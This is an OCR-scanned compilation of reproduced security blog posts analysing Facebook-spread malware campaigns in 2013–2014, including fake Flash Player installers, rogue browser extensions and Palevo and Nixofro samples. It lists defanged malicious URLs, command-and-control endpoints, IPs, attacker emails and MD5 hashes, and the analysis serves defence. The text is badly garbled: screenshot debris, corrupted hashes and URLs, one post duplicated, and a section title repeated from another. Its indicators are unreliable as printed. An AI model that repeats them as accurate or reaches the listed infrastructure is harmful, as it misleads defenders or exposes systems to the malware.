[2]resulted in over 1 million clicks, the campaign remains active, and continues tricking users 
into installing the rogue Adobe Flash Player, resulting in the continued spread of the campaign, 
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on the Facebook Walls of socially engineered users. 


ee 


See also nonsense that does not follow anymore GgG these people do not pay 
attention to what you wear ? Sh4NcvDD27lyxWa t es 19 
others 


Odd minutes of the live broadcast! lw] Dress-through the 
difficult moments of the artist! 7QqQW vDD2 


Like * Comment * Share 


Let’s dissect the campaign, expose its infrastructure/command and control servers, and 
provide MD5s of the served malware. 


Spamvertised Facebook URL+redirection chain: hxxp://goo.gl/QeshtO; 
hxxp://goo.gl/vVbrHp; hxxp://goo.gl/OoSJ7z; hxxp://goo.gl/38qlq8; hxxp://goo.gl/QNQhc5 -> 
hxxps://9dvme0!lk2r0o0sqg3qb3rlk95z.storage.googleapis.com/qlfwum32gld35 iab9d2u4035- 
bjsvhjhu309.html?ref=12 -> hxxp://goo.gl/wKXmel -> hxxp://www.i-justice.org/g-0-27312- 
gooenn.html 


(94.23.166.27) -> hxxp://f3c47a0d01f3ec343f5 7-2ba5bba9317af81ae21c42000295a455.r9.cf4. 
rackcdn.com/24471bmbqv07595?ref=27312 S&aff _sub=27312 &sub _id=27312 -> 
hxxp://www.eklentidunyasi.com/dl.php (176.31.2.155) or hxxp://www.agentofex.com/dl.php 
(176.227.218.99; www.puee.in) -> 


hxxp://docs.google.com/uc?export=download &id=OB6DFdqpSFDAISmpsTkZkT2hvN28 
or hxxps://doc-0g-40-docs.googleusercontent.com/docs/securesc/ha0ro937gcu 
c7!7deffksulhg5h7mbp1/7fobm9gn6 7t&t1 8r8etd00jufOrvmrrmh/1387836000000/1 - 
6300082901287672546/*/OBZU3dARQGry0TIMxN3F2STNOZ3M 
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GA Account ID: UA-36486228-1 


http://goo.gliwKXme1 ee Ob 7740) 
“ue ; ‘ "3 i 
Total Clicks Ol} r.2 
45,500 ks for the past: two hours | day | week | month | all time 


Untanowevempty 


Countries Platforms 


A - 


Detection rate for the served malware: [3]MD5: 30118bec581f80de46445aef79e6cf10 - 
detected by 33 out of 48 antivirus scanners as Trojan-Ransom.Win32.Blocker.dbud. 


Once executed, the sample phones back to: 
hxxp://176.31.2.155/extFiles/control8.txt 


hxxp://176.31.2.155/extFiles/NewFile0008.exe 
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hxxp://176.31.2.155/extFiles/version.txt 
hxxp://176.31.2.155/extFiles/list.txt 
hxxp://176.31.2.155/extFiles/list.txt 
hxxp://176.31.2.155/extFiles/buflash.xpi 
hxxp://176.31.2.155/extFiles/bune10.zip 
hxxp://176.31.2.155/extFiles/private/sandbox _status.php 


hxxp://176.31.2.155/extFiles/extFiles/yok.txt 


@ login 


® e Ey register 
uM Hi ari home category channel 


Forget to wear pants, Selena Star sparks underwear riddle 


Please install Flash Player. 


tha 15,547» sched 1 day ago 
@ Vider share f g in 
Navigator Social Newtork 
» home §B Facebook 

saa Pe | Twett 
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The files were offline in time of processing of the sample. 


Related MD5s for the same served fake Adobe Flash Player: 
MD5: 61f5af5d0067ea8d10f0764ff3c82066 

MD5: 80b9ef43183abdd5b22482bc1cea7b36 

MD5: 2da7cb838234eebbca3115fcafd6f513 

MD5: 40ae8d901102ee3951c241b394eb94e9 

MD5: 30118bec581f80de46445aef79e6cf10 

MD5: 2de9865032e997d59c03bfd8435flada 


MD5: fce013bec7b3651c100b6887c0a12eee 


4 Adobe |S 
Adobe has encountered a problem and needs to close. We are sorry for the Sf 
inconvenience. 


If you were in the middle of something, the information you were working on might be lost. 


Please tell Microsoft about this problem. 


We have created an error report that you can send to help us improve Adobe. We will treat 
this report as confidential and anonymous. 


What data does this error report contain? 


Why should | report to Microsoft? 


Microsoft Error Reporting cannot connect to the reporting servers at this time. If you would 
like to be prompted to report later, click Send Report Later. 


Send Report Later L 
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Once executed, MD5: fce013bec7b3651c100b6887c0al2eee phones back to: 
hxxp://176.227.218.99/extFiles/control17.txt 
hxxp://176.227.218.99/extFiles/NewFile00017.exe 
hxxp://46.163.100.240/NewFile00017.exe 
hxxp://176.227.218.99/NewFile00017.exe 
hxxp://176.227.218.99/extFiles/extFiles/version.txt 
hxxp://176.227.218.99/extFiles/extFiles/list.txt 
hxxp://176.227.218.99/extFiles/extFiles/buflash.xpi 


hxxp://176.227.218.99/extFiles/extFiles/bune10.zip 


Files remain offline in the time of processing of the sample. 


1. http://ddanchev. blogspot . com/2013/12/continuing-facebook-whos-viewed- your. htm 


2. http: //ddanchev.blogspot . com/2013/12/facebook-circulating-whos-viewed-your.htm 


3. https://www.virustotal .com/en/file/adec1707efaal1496691d5d4b12daaadf f893b0f 0ad68b33699e5dd7dd6f8eb58/analys 
is/1387838333/ 


10.1.4 Dissecting the Ongoing Febipos/Carfekab Rogue Chrome/Firefox Extensions 
Dropping, Facebook Circulating Malicious Campaign (2014-01-09 17:21) 


Who Views Your Profile 
who fs viewing your ¢ 4 who has viewed it while you were offline? 


wanted to know 


Ne 


> 2s 
facebook 


And, (not surprisingly) they’re back! The cybercriminal(s) behind the 1 million+ clicks 
strong Febipos/Carfekab rogue Chrome/Firefox extensions dropping malicious campaign, 
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continue utilizing the already infected ’population’ for the purpose of disseminating the newly 
packed/modified extensions/samples across Facebook, with yet another campaign that I'll 
dissect in this post. 


Catch up with previous research dissecting the previous campaigns: 


¢ [1]Facebook Circulating "Who’s Viewed Your Profile’ Campaign Exposes 800k+ Users to 
CrossRider PUA/Rogue Firefox Add-ons/Android Adware AirPush 


¢ [2]Continuing Facebook "Who’s Viewed Your Profile" Campaign Affects Another 190k+ 
Users, Exposes Malicious Cybercrime Ecosystem 


{| 


My profile has been viewed today 712 times. 


Top 5 Visitors: 

i- visits 

2- its 

3- visits 

4- 38 visits 
= 16 visits 


See who has viewed your profile HERE: 


http://GXOMZRC.tk/?74604844 t | id 48 others 


Redirection chain: hxxp://GXOMZRC.tk/?74604844 (93.170.52.34) - 
> hxxp://wqeuijlks.igg.biz/?asdjas22222222222222 (88.198.132.3) -> 
hxxp://prostats.vfl.us/s.hAtm -> hxxp://vidsvines.com/d/ -> hxxp://vidsvines.com/d/firefox 
-> 

hxxp://vidsvines.com/d/ch/ -> hxxp://vidsvines.com/d/ch/profile2.html (192.157.201.42) 


First GA Account ID: UA-23441223-3 
Second GA Account ID: UA-25941572-1 
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2 Youll see 2 yellow message on top of your screen once downiloac is fineshed. 
* Now go to chrome:tichromelextensions/ 
i 1 I Protite Viewer 


DY & btersons 


All you have to do now is drag the CRX 
file from the bottom toolbar to the 
extensions page: 


. e 


Actual malicious content hosting locations (legitimate infrastructure again): 
hxxps://docs.google.com/uc?authuser=0 &id=O0BziH-mKCuQwqVFgyZzFzZR103YTQ 
port=download 


hxxps://dl.dropboxusercontent.com/s/tj9n05qhjvnkg4s/whoviewsfam.xp i 


Detection rates for the served rogue Chrome/Firefox extensions: 
[3]MD5: 0ee44443c73bd9b072c7fldbb6b7b591 

[4]MD5: c4953f63ab46c796e23388f9c1cfa273 

[5]MD5: 5bcec283594e863f5dd238e2d22446c7 


&ex- 
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Who Viewed Your Profile 


N More ways to experience Facebook 


on facebook! 


Ever wanted to see how views your 
profile? 

on Facebook? Now you can! 

Let yourself do it already! 

It's Just an Extension to install. 


INSTALL 


Once executed, [6]MD5: 5bcec283594e863f5dd238e2d22446c7 38 drops MD5: 
deb483270b9ed5da7fcfldOla6fde8a7 and MD5: 90b77a477d815c771559d08ea80cc0c8 
it then phones back to 212.117.32.20. 
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History — (132) & 365 


Ee fait 


} Data 


Related malicious MD5s known to have phoned back to the same IP: 
MD5: 33408f35623dc5bb4a3bde09fa45f86b 
MD5: 56a54a700ae5700c3cd3da9c2ad226cf 
MD5: f86812305039156blda8fc29bdddebb7 
MD5: ede8f20d78a81c7da/6ad7def37ebbdd 


This post has been reproduced from [7]Dancho Danchev’s blog . Follow him 
[8]Jon Twitter. 


1. 

2. http: //ddanchev. blogspot .com/2013/12/facebook-circulating-whos-viewed-your.htm 

3. 
4. 
5. 
6. 
Foy tina cos ancien) 


co ™N 


10.1.5 Dissecting the Ongoing Febipos/Carfekab Rogue Chrome/Firefox Extensions 
Dropping, Facebook Circulating Malicious Campaign (2014-01-09 17:21) 
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Who Views Your Profile 


viewing y le of who has wed it while y 


yd 


facebook 


And, (not surprisingly) they’re back! The cybercriminal(s) behind the 1 million+ clicks 
strong Febipos/Carfekab rogue Chrome/Firefox extensions dropping malicious campaign, 
continue utilizing the already infected ‘population’ for the purpose of disseminating the newly 


packed/modified extensions/samples across Facebook, with yet another campaign that I'll 
dissect in this post. 


Catch up with previous research dissecting the previous campaigns: 


¢ [1]Facebook Circulating "Who’s Viewed Your Profile’ Campaign Exposes 800k+ Users to 
CrossRider PUA/Rogue Firefox Add-ons/Android Adware AirPush 


¢ [2]Continuing Facebook "Who's Viewed Your Profile" Campaign Affects Another 190k+ 
Users, Exposes Malicious Cybercrime Ecosystem 
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My profile has been viewed today 712 times. 
Top 5 Visitors: 


1- visits 

2- its 

3- visits 

4- 38 visits 
5- 16 visits 


See who has viewed your profile HERE: 


http ://GXOMZRC.tk/?74604844 th EE _ pnd 48 others 


Redirection chain: hxxp://GXOMZRC.tk/?74604844 (93.170.52.34) - 
> hxxp://wqeuijlks.igg.biz/?asdjas22222222222222 (88.198.132.3) -> 


hxxp://prostats.vfl.us/s.htm -> hxxp://vidsvines.com/d/ -> hxxp://vidsvines.com/d/firefox 
-> 


hxxp://vidsvines.com/d/ch/ -> hxxp://vidsvines.com/d/ch/profile2.html (192.157.201.42) 


First GA Account ID: UA-23441223-3 


Second GA Account ID: UA-25941572-1 
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2 Youll see 2 yellow mettage on top of your screen once download is fireshed. 
* Now go to chrome:tichrome/extensions/ 
if C1 #0 Prete Viewer 


BY & bterscns 


All you have to do now is drag the CRX 
file from the bottom toolbar to the 


extensions page: 


Actual malicious content hosting locations (legitimate infrastructure again): 
hxxps://docs.google.com/uc?authuser=0 &id=O0BziH-mKCuQwqVFgyZzFzR103YTQ &eXx- 


port=download 
hxxps://dl.dropboxusercontent.com/s/tj9n05qhjvnkg4s/whoviewsfam.xp i 


Detection rates for the served rogue Chrome/Firefox extensions: 
[3]MD5: 0ee44443c73bd9b07 2c7fldbb6b7b591 
[4]MD5: c4953f63ab46c796e23388f9c1cfa273 


[5]MD5: 5bcec283594e863f5dd238e2d22446c7 
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Who Viewed Your Profile 


N More ways to experience Facebook 


on facebook! 


Ever wanted to see how views your 
profile? 

on Facebook? Now you can! 

Let yourself do it already! 

It's Just an Extension to install. 


INSTALL 


Once executed, [6]MD5: 5bcec283594e863f5dd238e2d22446c7 drops MD5: 
deb483270b9ed5da7fcfldOla6fde8a7 and MD5: 90b77a477d815c771559d08ea80cc0c8 
it then phones back to 212.117.32.20. 
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+% 


History — (132) & 24h 30d 12m 


& 
iii 


Brox Mave MB nic 


519 users 


Related malicious MD5s known to have phoned back to the same IP: 
MD5: 33408f35623dc5bb4a3bde09fa45f86b 
MD5: 56a54a700ae5700c3cd3da9c2ad226cf 
MD5: f86812305039156b1da8fc29bdddebb7 


MD5: ede8f20d78a81c7da76ad7def37ebbdd 


Updates will be posted as soon as new developments take place. 


3. https: //waw.virustotal. com/en/tile/ae0ac523f752b320a1 03bef eact c960e6186b01343d7598t 48664af cb4cedd’ 1/analys 
4. https: //www.virustotal . com/en/file/dd46cd6ec5b139f 55a9ddec75fed261568c06abf 1883cf 28dc1£5a3491c3e0c1 /analys 
5. https: //www.virustotal. com/en/file/7737cf0c74e5e84£543a37 9f f 9e42ac37 2f78f f0e8eb4c847a7bc4d07f8b1368/analys 
6. https: //waw.virustotal.com/en/file/7737cf0c74e5e84f543a379f f 9e42ac37 2f78f f0e8eb4c847a7bc4d07f 8b1368/analys 
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10.1.6 Facebook Spreading, Amazon AWS/Cloudflare/Google Docs Hosted Campaign, 
Serves P2P-Worm.Win32.Palevo (2014-01-16 21:27) 


Oo 


Reyting ugruna her gun neler goruyoruz vallahi yazik!8 lyghi8gds4i Valla bunlarda 
kisilik falan kalmamis kardesimX Bunlar da hakli hic bir yetenegi olmayan insanlar 


sonucta bunlar!Y zslqsemi | 18 others 
| NN Pe izledim. Rezillik!! 


like * Comment « Share 


A currently circulating across Facebook, multi-layered monetization tactics utilizing, Turkish 
users targeting, malicious campaign, is attempting to trick users into thinking that they need 
to install a fake Adobe Flash Player, displayed on a fake YouTube Video page, ultimately serving 
P2P-Worm.Win32.Palevo on the hosts of the socially engineered (international) users. 


Let’s dissect the campaign, expose its infrastructure in terms of shortened URLs, redirec- 
tors, affiliate network IDs, landing pages, pseudo-random Facebook content generation 
phone back URLs, legitimate infrastructure hosted content, and provide MD5s for the served 
malicious content. 


Sample redirection chain: hxxp://m3mi.com/10469 -> hxxp://facebookikiziniz.com/yon.html?MYt- 


DmZp4xjbUP9AOOHL) -> hxxp://facebookikiziniz.com/yon.html?7MYtDmMZp4xjbUP9AOOHL -> 
hxxp://facebookikiziniz.com/yon.html?MYtDmZp4xjbUP9AOOHL{ 


4949 


nttps:/izieyelim.s3.amazonaws.com/ingir.ntmi 


http://goo.gl/XpNHIL 


21,502 iam diiaaaaak 


Referrers Browsers 


Other 


Internal campaign redirection structure+associated affiliate network IDs+landing URLs: 
hxxp://mobiltrafik.s3.amazonaws.com/mobil.html 
hxxp://mobiltrafik.s3.amazonaws.com/yurtdisi-anroid.html -> hxxp://ad.adrttt.com/aff _c?offer 
_ld=1743 G&aff id=3236 &source=yurtdisi -> hxxp://ads.glispa. com/sw/49399/CD353/102 
3a788c68361b710b87b8ed4851a -> hxxps://play.google.com/store/apps/detai- 
Is?id=com.mobogenie.marketstl 
hxxp://mobiltrafik.s3.amazonaws.com/yurtdisi-ios.html -> hxxp://ad.rdrttt.com/aff _c?offer 
_id=302 G&aff _id=1014 ->  hxxp://www.freehardcorepassport.com/?t=116216,1,96,0 
&xX= pornfr _tracker=9208KOMm00B0193IbJ[3ykO1BNW00005m 
hxxp://mobiltrafik.s3.amazonaws.com/yurtdisiweb.html -> hxxp://ad.rdrttt.com/aff 
_croffer _id=302 S&aff _id=1014 ->  hxxp://ads.polluxnetwork.com/hosted/w2m.- 
php?tid= 1023e4f08cae470c2f74aa 3d1e2d17 &o0id=6200 &aid=758 -> 
hxxp://m.pornfr.3013.idhad.com/xtrem/index.wim! 
hxxp://mobiltrafik.s3.amazonaws.com/androidwifi.html -> hxxp://ad.adrttt.com/aff _c?offer 
_ld=1743 S&aff id=3236 S&source=yurtici -> hxxp://ads.glispa. com/sw/49399/CD353/102 
3a788C68361b710b87b8ed4851a 
hxxp://mobiltrafik.s3.amazonaws.com/iphonewifi.html -> hxxp://ad.adrttt.com/aff _c?offer 
_ld=1705 &aff id=3236 -> hxxps://itunes.apple.com/tr/app/id451786983?mt=8 
AXxp: ‘//mobiltrafik. s3.amazonaws.com/turkcell.html -> hxxp://goo.gl/GBKArV 
hxxp://mobiltrafik.s3.amazonaws.com/vodofone.html -> hxxp://ad.adrttt.com/aff 
_c?offer _id=1785 &aff _id=3236 -> hxxp://c.mobpartner.mobi/?s=1007465 &a=3578 
&tid1 =102afc4360ecadbed491b5c08f7395 
hxxp://mobiltrafik.s3.amazonaws.com/avea.html -> hxxp://ad.juksr.com/aff _c?offer _id=709 
&aff id=3236 -> hxxp://wap.chatwalk.com/landings/?name=yilbasi2 G&affid=reklamaction 
&utm _campaign=3236 &clk=1025fa187aca81ce5/7edf8adca7a9c 
hxxp://mobiltrafik.s3.amazonaws.com/trweb.html ->  hxxp://ad.adrttt.com/aff _c?offer 
_Id=1689 &aff_id=3236 &source=yurticidefault -> hxxps://www.matchanatalk.com/splashmobil- 
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e/10?sid=12 &bid=663 

hxxp://s3.amazonaws.com/Yonver/tarayici.html -> hxxp://ad.adrttt.com/aff _c?offer _id=1091 

&aff id=3236 &source=tarayicidan -> hxxps://www.matchanatalk.com/splash/12?s id=12 
&bid=651 &cid=29 

hxxp://izleyelim.s3.amazonaws.com/unlu.html -> hxxp://goo.gl/XpNHIL (21,512 clicks) -> 
hxxps://izleyelim.s3.amazonaws.com/indir.html 
hxxps://s3.amazonaws.com/facebookAds/ortaryon.html -> hxxps://www.matchandtalk.com/splash/1z 
id=12 &bid=651 &cid=29 


Dashboard — (7,643) & Folow @uhosamungus 


Dx History 


— 
+= READERS 
Unimown 
wi as 


https: //www.goode com. tr/ 
5.4% 
59 http://www. friv.com/ 
am 


2A" n/ wenn oGnobassnihs a / 
a 


1 9 nape www. you tube_com/ 


Malicious/fraudulent domain name reconnaissance: 

facebookikiziniz.com - 108.162.195.103; 108.162.194.103 

ttcomcdn.com - 162.159.241.195; 162.159.242.195 - Email: masallahkilic@hotmail.com 
amentosx.com - 141.101.116.113; 141.101.117.113 

ad.adrttt.com - 54.236.194.194 
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+6 


History — (7,462) & 24h) 30d) 12m\\368) | A 


Brox Bavg Brin 


i Mata + 


The campaign is also mobile device/PC-aware, and is therefore automatically redirecting users 
to a variety of different locations/affillate networks. Case in point, the redirection to Google 
Play’s Mobogenie Market App (Windows application detected as Adware.NextLive.2 [1]MD5: 
9dd785436752a6126025b549be644e76), and the iOS compatible SK planet’s TicToc app. 


Now comes the malicious twist, in the form of Fake Adobe Flash Player, that socially en- 
gineered users would have to install, in order to view the non-existent YouTube video content. 
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Video Yikie ¥ 


Dil Tirkge ¥ ke Tirhye + ivenbk Ack + Yer@m « 


Actual Fake Adobe Flash Player hosting locations within Google Docs: 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyYH _w8BCFCWZIRGYOVI1IxNVU 
hxxps://docs.google.com//uc?authuser=0 &id=OB9IOVyYH _w8BCFQVBsdVVOekYyNGs 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VyH _w8BCFaEN2TnE4M0sxWHM 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyH _w8BCFVXRnbkYtNG5wVDA 
hxxps://docs.google.com//uc?authuser=0 &id=OB9O0VyYH _w8BCFR2ZNnRXFRUmtNTTQ 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VyH _w8BCFOWFGZnIxXMkZWcCUE 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VYH _w8BCFCWZZbTIj|MkJWZ3c 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyYH _w8BCFYkpEdXl4ZGVaaUE 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyYH _w8BCFMUxzyY0dQTTJMV0O 
hxxps://docs.google.com//uc?authuser=0 &id=OB9IOVyH _w8BCFNmMROSXhMSGdCYUU 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VyYH _w8BCFbORoZVitMmsyRFU 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VYH _w8BCFb2k2MFN4QTY1ZUE 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VYH _w8BCFb1AzZXl4emIGROO 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VyYH _w8BCFSDZBRDJ4QjVqdkU 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyYH _w8BCFUXgtZ1VQVU9OdVU 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyYH _w8BCFUII6cOYOMWxLZW8 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyYH _w8BCFSW55S3ROSWcxdDQ 
hxxps://docs.google.com//uc?authuser=0 &id=O0B9I0VyYH _w8BCFMWtxaG/TMnpMVDA 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyYH _w8BCFSk9yUW5/dDVKaUU 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VyYH _w8BCFN3pTXzcxcDIObkU 
hxxps://docs.google.com//uc?authuser=0 &id=O0B90VYH _w8BCFQOp3dV9qcC1uOFU 
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hxxps://docs.google.com//uc?authuser=0 &id=OB90VyH _w8BCFOFZRcDZwa0ZfcVk 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyH _w8BCFNkoyNktzQ2d]VIE 
hxxps://docs.google.com//uc?authuser=0 &id=OB90VyH _w8BCFS2x/dTE4Nk04QnM 


Dash board =e (556) & Follow @whosamungus 8*! 
' ’ Get your own fore stats page Banner tan accra 
Oy History 
Brox Bave Brin 
t= Reavers 
wie —teni eh aia tp ae 


Detection rate for the fake Adobe Flash Player: 
[2]MD5: 5bf26bd488503a4b2b74c7393d4136e3 - detected by 3 out of 47 antivirus scanners 
as P2P-Worm.Win32.Palevo.hexb; PE:Trojan.VBInject!1.6546 


Once executed, the sample also drops: 
[3]MD5: a8234e13f9e3af4c768de6f2d6204b3c 


Once executed, the sample phones back to: akillitelefonburada.com (108.162.196.162). 
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Sample pseudo-random bogus Facebook content generation takes place through: 
hxxp://www.amentosx.com/ext/r.php -> hxxps://S3.amazonaws.com/facebookAds/ark- 
adaj.html -> hxxp://ttcomcdn.com/tw.php 


This post has been reproduced from [4]Dancho Danchev’s blog . Follow him 
[5]Jon Twitter. 


1, https: //www.virustotal .com/en/file/bc9c9cb2a1219b87 cdb9e356b7 2f 2e64c1ac2e9250302e7 2b426ad5 1dcc6818£/analys 
2. lvepa:/ /www.virustotal. con/en/£ile/9c099917 7608 TocS05QIcE986304acdbGFaaceBl 3159161 cdDadbelffad0c5/analys 
fad 

"https: //uy,virustotal, con/en/fie/4793c\ee11944940# if abda399079102159644546a40eeb0cad07S35fbe7520/ analy 
Fad 
4. hivp://Adanchev. blogspot. con/ 
5. http: //ewitter..com/danchodanched 
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10.1.7 Facebook Spreading, Amazon AWS/Cloudflare/Google Docs Hosted Campaign, 
Serves P2P-Worm.Win32.Palevo (2014-01-16 21:27) 


I’ve recently spotted a malicious, cybercrime-friendly SWF iframe/redirector injecting service, 
that also exposes a long-run Win32.Nixofro serving malicious infrastructure, currently utilized 
for the purpose of operating a rogue social media service provider, that’s targeting Turkish 
Facebook users through the ubiquitous social engineering vector, for such type of campaigns, 
namely, the fake Adobe Flash player. 


Let’s profile the service, discuss its relevance in the broader context of the threat land- 
scape, provide actionable/historical threat intelligene on the malicious infrastructure, the 
rogue domains involved in it, the malicious MD5s served by the cybercriminals behind it, 


and directly link it to a [1]previously profiled Facebook spreading P2P-Worm.Win32.Palevo 
serving campaign. 


The managed SWF iframe/redirector service, is a great example of a cybercrime-as-a- 
service type of underground market proposition, empowering, both, sophisticated and novice 
cybercriminals with the necessary ([2]malvertising) ’know-how’, in an efficient manner, di- 
rectly intersecting with the commercial availability of [3]sophisticated mass Web site/[4]Web 
server malicious script embedding platforms. 
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Suan sitedeki 985 kisi toplam 3,457 video'nun keyfini cikariyor.. Sizde onlardan birisi olun! 


* gitis yap 


# Recep ivedik 4 ( Full izle - HD Ucretsiz ) 


Please install Flash Player... 
1 giin nce eklendi 
15,547 kez izlendi 
Paylas: 
Video 
-uniuvidesiort inf 


e Hizh Meni 
. 
. 
e . kategoriler 
. 
. 
. 
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‘latiai 


¢ Sosyal Aglar 

. 
 Twitter'dan Takip Edin! 
° 

. 


The managed SWF _iframe/redirector 


injecting service is currently responding to 


108.162.197.62 and 108.162.196.62 Known to have responded to the same _ IPs 
(108.162.197.62; 108.162.196.62) is also a key part of the malicious infrastructure that 
I’ll expose in this post, namely hizliservis.pw - Email: furkan@cod.com. 


_ 
Hegena (7 gHen) 
Mecau (30 aHen) 


Fog (365 aven) 


5 1 0.5 
10 2 1 
15 5 2 
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Known to have phoned back to the same IP (108.162.197.62) are also the following 
malicious MD5s: 


MD5: 432efe0fa88d2a9e191cb95fa88e7b36 
MD5: 720ecb1cf4f28663f4ab25eedf620341 
MD5: 02691863e9dfb9e69b68f5fca932e729 
MD5: 69ed70a82cb35a454c60c501025415aa 
MD5: cc586a176668ceef14891b15e1b412ab 
MD5: 74291941bddcec131c8c6d531fcb1886 
MD5: 7c27d9ff25fc40119480e4fe2c7ca987 
MD5: 72c030db7163a7a7bf2871a449d4ea3c 


MD5: 432efe0fa88d2a9e191cb95fa88e7b36 


Known to have phoned to the same IP (108.162.196.62) are also the following malicious MD5s: 
MD5: eda3f015204e9565c779e0725915864f 

MD5: effcfe9lbeaf7a3ed2f4ac79525c5fc5 

MD5: 14acd831691173ced830f4b51a93elca 

MD5: 7f93b0c611f7020d28f7a545847b51e0 

MD5: bcfce3a9bf2c87dab806623154d49f10 

MD5: 4c90a89396d4109d8e4e2491c5da4846 


MD5: 289c4f925fdec861c7f765a65b7270af 


Sample redirection chain leading to the fake Adobe Flash Player: 
hxxp.//hizliservis.ow/unlu.htm -> hxxp://hizliservis.pw/indir.php -> hxxp://unluvideolari.info 


-> hxxp://videotr.in/player.swf -> hxxp://izleyelim.s3.amazonaws.com/movie.mp4 
&skin=newtubedark/NewTubeDark.xml &streamer=lighttpd &image=hqdefault.jpg 
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Domain name reconnaissance: 
hizliservis.pw - Email: furkan@cod.com 
videotr.in - Email: tiiknet@yandex.com; snack@log-z.com 


izleyelim.s3.amazonaws.com - 176.32.97.249 


Within hizliservis.pw, we can easily spot yet another part of the same malicious/fraudulent 
infrastructure, namely, the rogue social media distribution platform’s login interface. 


SocialMediaSystem.Net 


K Enter your credentials to logm 


Sample redirection chain leading to a currently active fake Adobe Flash Player 
(Win32.Nixofro): 


hxxp://socialmediasystem.net/down.php = -> hxxps://profonixback31.googlecode.com/sv- 
n/FlashPlayer Guncelle.exe 
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s://DueXe-x. lecode.com/svn/FlashPi; Setup.exe 
http://goo.gl/ber2EP on -_ — BAe 
Created: 2014 Feb 22 = 
Total Clicks & pi 

35,648 Clicks for the past: two hours | day | week | month | all time 
40,000 
W000 
20.000 
10,080 

Jul 2070 Jan 2018 Jub 2011 Jan 2012 jut 2012 Jan 2013 Jul 2093 Jan 2014 


son 


OsFusyv i 
lternet Ex 
overs 
25% ° 7509 16,000 22,509 30.000 
Countries Platforms 


IY =. - - 
ones | 
0 a 27,874 ° 10,000 20,000 20,000 40,000 


Detection rate for the fake Adobe Flash Player: 


[5]MD5: 28c3c503d398914bdd2c2b3fdcl1f9ea4 - detected by 36 out of 50 antivirus scan- 
ners as Win32.Nixofro 


Once executed, the sample phones back to profonixuser.net (141.101.117.218) 


Known to have responded to the same IP (141.101.117.218) are also the following ma- 
licious MD5s: 


MD5: 53360155012d8e5c648aca277cbde587 
MD5: a66alc42cc6fb775254cf32c8db7ad5b 
MD5: a051fd83fc8577b00d8d925581afla3b 
MD5: f47784817a8a04284af4b602c7719cb7 
MD5: 2e5c75318275844ce0ff7028908e8fb4 


MD5: 90205a9740df5825ce80229cal05b9e8 


Domain name reconnaissance for the rogue social media distibution platform: 


socialmediasystem.Net (141.101.118.159; 141.101.118.158) - Email: furkan@cod.com 


Sample redirection chain for the rogue social media distribution platform’s core func- 
tions: 


hxxp://profonixuser.net/new.php?nocache=1044379803 -> hxxp://sosyalmedyakusu.com/oauth. php 
(108.162.199.203; 108.162.198.203) Email: furkan@cod.com -> 
hxxp://hizliservis.pw/face. php -> hxxp.://socialhaberler.com/manyak.php -> 
hxxp://profonixuser.net/new.php -> hxxp://profonixuser.net/amk.php (141.101.117.218) -> 
hxxp://me.cf/dhtcw (31.170.164.67) -> hxxps://video-players.herokuapp.com/?55517841177 
(107.20.187.159) -> hxxp://kingprofonix.net/hxxp://kingprofo nix.com (108.162.198.203) the 
same domain is also known to have responded to 108.162.197.62 
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+i 


History — (26) & 12m A 


epoch mines 


} Data; 


Related MD5s known to have phoned back to the same IP (108.162.198.203) in the 
past: 


[6]MD5: 505f615f9e1c4fdc03964b36ec877d57 


Sample internal redirectors structure: 


hxxp://profonixuser.net/fb.php -> hxxp://profonixuser.net/manyak.php -> 
hxxp://molotofcu.com/google/hede.php (199.27.134.199) -> hxxp://profonixuser.net/pp.php -> 
hxxp://gdriv.es/awalbbmprtbpahpolcdt?jgxebgqjl -> hxxps://googledrive.com/host/OBO8vFK4UtN- 
5kdjV2NkKIHVTVjcTQ -> hxxp://sosyalmedyakusu.com/s3x.php?ref=google 


hxxp://profonixuser.net/user.php -> hxxp://goo.gl/ber2EP -> hxxps://buexe- 


x.googlecode.com/svn/FlashPlayer %20Setup.exe -> [7]MD5: 60137c1cb77bed9afcbbbc3ad910df3f 
-> phones back to wjetphp.com (46.105.56.61) 
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Secondary sample internal redirectors structure: 


hxxp://profonixuser.net/yarak.txt -> hxxp://profonixuser.net/u.exe - 
> hxxp://profonixuser.net/yeni. txt -> hxxp://profonixuser.net/yeni.exe - 
> hxxp://profonixuser.net/recep.html -> hxxp://goo.gl/ber2EP -> 
hxxp://wjetphp.com/unlu/player.swf -> hxxp://profonixuser.net/kral.txt -> 


hxxp://likef.in/fate.exe - 108.162.194.123; 108.162.195.123; 108.162.199.107 - known 
to have phoned back to the same IP is also the following malicious [8]MD5:  ef- 
fcfe9 lbeaf7a3ed2f4ac79525c5fc5 - detected by 35 out of 50 antivirus scanners as Trojan- 
Ransom.Win32.Foreign.kcme 


S+m f 


History — (0) & 12m 


| Data | 


Once executed, the sample phones back to likef.biz (176.53.119.195). The same domain is 
also known to have responded to the following IPs 141.101.116.165; 141.101.117.165. 


Here’s comes the interesting part. The fine folks at [9]ExposedBotnets, have already in- 
tercepted a malicious Facebook spreading campaign, that’s using the already profiled in this 
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post videotr.in. 


Having directly connected the cybercrime-friendly SWF iframe/redirector injecting ser- 
vice, with hizliservis.pw as well as the SocialMediaSystem as being part of the same malicious 
infrastructure, it’s time to profile the fraudulent/malicious adversaries behind the campaigns. 
The cybercriminals behind these campaigns, appear to be operating a rogue social media 
service, targeting Facebook Inc. 


Sample screenshots of the social media distribution platform’s Web based interface: 


€ 2 CS protnesyaconf SS 


<r Riber fay mDestekg@notmal com tr 
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€ C SEerofmedya.co , | Q = 


Suanda Yapilan isiemler 


Liste Gekimi Artik AKTIF ! 


™ 


Odeme Kanalian 


Miceli 


Sample advertisement of the rogue social media distribution platform: 
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Facebook Page Member Shooting ! 


1K: 5$ 
2K: 10$ 
3K: 15$ 
